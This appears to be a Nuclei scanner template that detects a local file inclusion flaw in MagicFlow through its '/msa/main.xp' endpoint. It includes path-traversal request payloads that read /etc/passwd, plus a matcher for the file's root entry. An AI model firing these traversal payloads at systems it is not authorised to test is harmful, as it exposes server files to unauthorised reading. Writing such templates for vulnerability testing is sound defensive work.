id: magicflow-lfi

info:
  name: MagicFlow - Local File Inclusion
  author: gy741
  severity: high
  description: |
    MagicFlow is susceptible to local file inclusion vulnerabilities because it allows remote unauthenticated users to access locally stored files on the server and return their content via the '/msa/main.xp' endpoint and the 'Fun' parameter.
  reference:
    - https://www.seebug.org/vuldb/ssvid-89258
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cwe-id: CWE-22
  tags: magicflow,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../../../../../../etc/passwd"
      - "{{BaseURL}}/msa/../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:

      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/05/30
